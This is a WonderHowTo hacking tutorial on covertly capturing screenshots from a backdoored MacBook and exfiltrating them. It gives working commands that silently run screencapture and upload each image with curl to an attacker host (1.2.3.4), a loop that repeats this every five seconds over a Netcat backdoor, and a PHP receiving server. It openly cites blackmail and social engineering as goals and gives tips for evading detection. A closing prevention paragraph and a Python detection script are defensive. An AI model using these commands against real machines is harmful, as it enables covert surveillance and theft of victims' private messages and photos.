
How To Automate Screenshot Exfiltration From A Backdoored MacBook «Zero Byte :: WonderHowTo



Gmail conversations, private Facebook messages, and personal photos can all be viewed by a hacker who has backdoor access to a target's Mac. Livestreaming the desktop or exfiltrating screenshots can be used for blackmail and targeted social engineering attacks to further compromise the target.

Livestreaming the entire Mac desktop may not be ideal for every information-gathering scenario. A big disadvantage of streaming video is the high CPU consumption. If you stream at a high frame rate, the MacBook's CPU will heat up, which can make the target suspicious. Streaming also requires additional third-party software to work, and that software can be detected by antivirus software or by the target themselves.

A quieter alternative to livestreaming is screenshot exfiltration. By quiet I mean producing minimal traffic on the network and low CPU usage. After all, someone watching network traffic while we stream the target's desktop will likely notice the suspicious data leaving the device.

Using the Command-Line Tool Screencapture

Screencapture is a built-in macOS (formerly Mac OS X) command-line tool capable of capturing screenshots of the entire macOS desktop. To view the available screencapture options and arguments, use the man command to open its manual page.

  SCREENCAPTURE(1)          BSD General Commands Manual          SCREENCAPTURE(1)

  NAME
       screencapture - capture images from the screen and save them to a file
       or the clipboard

  SYNOPSIS
       screencapture [-SWCTMPcimswxto] file

  DESCRIPTION
       The screencapture utility is not very well documented to date. A list
       of options follows.

       -c          Force screen capture to go to the clipboard.
       -C          Capture the cursor as well as the screen. Only allowed in
                   non-interactive modes.
       -i          Capture screen interactively, by selection or window. The
                   control key causes the screenshot to go to the clipboard.
                   The space key toggles between mouse selection and window
                   selection modes. The escape key cancels the interactive
                   screenshot.
       -m          Only capture the main monitor; undefined if -i is set.
       -M          Open the captured picture in a new Mail message.
       -o          In window capture mode, do not capture the shadow of the
                   window.
       -P          Open the captured picture in a Preview window.
       -s          Only allow mouse selection mode.
       -S          In window capture mode, capture the screen instead of the
                   window.
       -t <format> Image format to create, default is png (other options
                   include pdf, jpg, tiff and other formats).
       -T <seconds> Take the picture after a delay of <seconds>, default is 5.
       -w          Only allow window selection mode.
       -W          Start interaction in window selection mode.
       -x          Do not play sounds.
       -a          Do not capture attached windows.
       -r          Do not add screen dpi metadata to the captured file.
       -b          Capture the Touch Bar; only works in non-interactive modes.
       files       Where to save the screen capture, 1 file per screen.

  BUGS
       Better documentation is needed for this utility.

  SECURITY CONSIDERATIONS
       To capture screen content while logged in via ssh, you must launch
       screencapture in the same mach bootstrap hierarchy as loginwindow:
           PID=pid of loginwindow
           sudo launchctl bsexec $PID screencapture [options]

  HISTORY
       A screencapture utility first appeared in Mac OS X v10.2.

  Mac OS                          June 16, 2004                          Mac OS

Below is an example screencapture command, followed by an explanation of some of its options/arguments and of the resulting image file.

  screencapture -C -x -t jpg /tmp/image.jpg && curl -F "image=@/tmp/image.jpg" 'http://1.2.3.4'
  • Capturing the target's mouse pointer is not required, but can be enabled with the -C argument. This can sometimes help in understanding what the target is doing in a given screenshot.
  • There are many supported image output formats (-t), such as PNG, PDF and TIFF. The JPG format is used in my example because it is one of the most common and produces smaller files, which generally makes exfiltrating screenshots faster.
  • Screencapture plays a very audible camera sound effect when the command is executed. The -x argument suppresses the camera sound effect, so it is essential if you hope to avoid detection.
  • Where the image is saved (/tmp/image.jpg) is appended to the end of the command. This can be any directory on the target's device; however, using ~/Pictures or ~/Desktop directly almost certainly leads to detection. Files in /tmp are automatically deleted when macOS is restarted.

Running this screencapture command from a Netcat backdoor does not alert the target user in any way. That's all there is to it.

Now, getting the screenshots off the target device can be challenging, especially if the firewall is enabled. We need an easy way to get screenshots from the target's MacBook onto our Kali system. To do that, we use cURL to send the screenshots from the MacBook, and a simple PHP server on Kali to receive and save the images.

Step 1: Prepare for Screenshot Exfiltration

Use the following apt-get command to install PHP.

  apt-get install php

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
  libapache2-mod-php7.2 (7.2.4-1+b2)
  libsodium23 (1.0.16-2)
  php-common (1:61)
  php7.2 (7.2.4-1)
  php7.2-cli (7.2.4-1+b2)
  php7.2-common (7.2.4-1+b2)
  php7.2-json (7.2.4-1+b2)
  php7.2-opcache (7.2.4-1+b2)
  php7.2-readline (7.2.4-1+b2)
  psmisc (23.1-1+b1)
Recommended packages:
  php-pear (1:1.10.5+submodules+notgz-1)
The following NEW packages will be installed:
  libapache2-mod-php7.2 (7.2.4-1+b2)
  libsodium23 (1.0.16-2)
  php (1:7.2+61)
  php-common (1:61)
  php7.2 (7.2.4-1)
  php7.2-cli (7.2.4-1+b2)
  php7.2-common (7.2.4-1+b2)
  php7.2-json (7.2.4-1+b2)
  php7.2-opcache (7.2.4-1+b2)
  php7.2-readline (7.2.4-1+b2)
  psmisc (23.1-1+b1)
0 upgraded, 11 newly installed, 0 to remove and 97 not upgraded.
Need to get 4,186 kB of archives.
After this operation, 18.1 MB of additional disk space will be used.
Do you want to continue? [Y/n] y

Make (mkdir) a directory in which the PHP server and the screenshots will be stored. The directory name "phpServer" is arbitrary and can be changed as required.

  mkdir phpServer

Change (cd) into the newly created phpServer/ directory.

  cd phpServer/

Use nano (or your favorite text editor) to create a file called "index.php". This file contains the following PHP script, which automatically receives the JPG screenshots sent from the macOS device and saves them locally.

  nano index.php

Copy the following PHP script into index.php and save it. This is a very simple PHP script, and you do not have to change a single line for it to work.

   

With that in place, we can start the PHP server with the following command. The command instructs PHP to launch a server (-S) on every available interface (0.0.0.0) on port 80.

  php -S 0.0.0.0:80

Step 2: Use cURL to send images

From the backdoored MacBook it is now possible to exfiltrate screenshots. With a single command we can use cURL to send a file of our choice to the PHP server on our Kali system.

  curl -F "image=@/tmp/image.jpg" 'http://1.2.3.4'

When the PHP server receives a screenshot, a new line reading "[200]: /" appears in the terminal. This indicates that the server is working and a new screenshot has been received.

  php -S 0.0.0.0:80

PHP 7.2.4-1+b2 Development Server started
Listening on http://0.0.0.0:80
Document root is /root/Desktop/phpServer
Press Ctrl-C to quit.
[Sat Aug 2018] 192.168.0.98:50235 [200]: /
[Sat Aug 2018] 192.168.0.98:50236 [200]: /
[Sat Aug 2018] 192.168.0.98:50237 [200]: /
[Sat Aug 2018] 192.168.0.98:50238 [200]: /
[Sat Aug 2018] 192.168.0.98:50239 [200]: /
[Sat Aug 2018] 192.168.0.98:50240 [200]: /
[Sat Aug 2018] 192.168.0.98:50241 [200]: /
[Sat Aug 2018] 192.168.0.98:50242 [200]: /
[Sat Aug 2018] 192.168.0.98:50243 [200]: /
[Sat Aug 2018] 192.168.0.98:50244 [200]: /
[Sat Aug 2018] 192.168.0.98:50248 [200]: /

Step 3: Automate Screenshots and Exfiltrations at Intervals

Exfiltrating a single screenshot is easy, but it is not practical if we have to collect a large number of screenshots over a longer period of time. Instead, we can create a for loop that reuses the screencapture command over and over again automatically. In the same loop, we can also run the cURL command immediately after each screencapture command completes.

Below is an example of a for loop that can be run through the Netcat backdoor.

  for count in {1..25}; do screencapture -C -x -t jpg /tmp/image.jpg && curl -F "image=@/tmp/image.jpg" 'http://1.2.3.4' && sleep 5; done
  • Here I use && to chain the commands together.
  • This loop takes 25 ({1..25}) screenshots before it stops. The other important bit is the sleep command I attached to the end of the loop body. It makes the loop pause for 5 seconds between screenshots; this value can be increased or decreased as needed.

The received screenshots can be found in phpServer/.

Preventing this type of attack on your Mac

The screencapture command is just one of many commands built into macOS that can be abused by hackers. Short of forcibly removing screencapture and cURL, there is not much you can do to prevent this kind of activity on your MacBook, Mac Pro or any other Mac computer. Better physical security practices, such as enabling a firmware password and encrypting the hard drive, prevent attackers from gaining access to your macOS devices in the first place.
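The cadence the loop above produces (a sound-suppressed screencapture written to /tmp, followed within seconds by a curl -F upload of that same file, repeated at a fixed interval) is itself something a defender can look for in process-execution telemetry. The following script is an added example, not code from the original article; the log line format (timestamp, user, command line) and the user names are assumptions, and the events are constructed.

```python
from datetime import datetime

# Constructed sample process-execution events (timestamp user command-line); not real telemetry.
SAMPLE_EVENTS = """\
2018-08-25T10:00:00 alice screencapture -C -x -t jpg /tmp/image.jpg
2018-08-25T10:00:01 alice curl -F image=@/tmp/image.jpg http://1.2.3.4
2018-08-25T10:00:06 alice screencapture -C -x -t jpg /tmp/image.jpg
2018-08-25T10:00:07 alice curl -F image=@/tmp/image.jpg http://1.2.3.4
2018-08-25T10:00:12 alice screencapture -C -x -t jpg /tmp/image.jpg
2018-08-25T10:00:13 alice curl -F image=@/tmp/image.jpg http://1.2.3.4
2018-08-25T11:30:00 bob screencapture -i /Users/bob/Desktop/shot.png
"""

def parse(line):
    ts, user, *argv = line.split()
    return datetime.fromisoformat(ts), user, argv

def silent_capture_path(argv):
    """Output path if this is a sound-suppressed (-x) screencapture, else None."""
    if argv[0] != "screencapture" or len(argv) < 2:
        return None
    flags = "".join(a[1:] for a in argv[1:-1] if a.startswith("-") and not a.startswith("--"))
    return argv[-1] if "x" in flags else None

def upload_path(argv):
    """Local file path if this is a curl -F/--form file upload, else None."""
    if argv[0] != "curl":
        return None
    for prev, cur in zip(argv, argv[1:]):
        if prev in ("-F", "--form") and "=@" in cur:
            return cur.split("=@", 1)[1]
    return None

def find_exfil_chains(events, max_gap=5, min_repeats=3, jitter=2):
    """Pair each silent capture with an upload of the same file within max_gap
    seconds, then report users whose pairs repeat at a near-fixed interval."""
    pending, pairs = {}, {}
    for line in events.strip().splitlines():
        ts, user, argv = parse(line)
        if (path := silent_capture_path(argv)):
            pending[(user, path)] = ts
        elif (path := upload_path(argv)) and (user, path) in pending:
            if (ts - pending.pop((user, path))).total_seconds() <= max_gap:
                pairs.setdefault(user, []).append(ts)
    alerts = {}
    for user, times in pairs.items():
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if len(times) >= min_repeats and max(gaps) - min(gaps) <= jitter:
            alerts[user] = {"count": len(times), "interval_s": round(sum(gaps) / len(gaps))}
    return alerts
```

An interactive screenshot saved to the Desktop (bob) is ignored, while three capture-and-upload pairs six seconds apart (alice) raise an alert with the observed interval.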


Cover photo by Tranmautritam / PEXELS; Screenshots of tokyoneon / zero byte
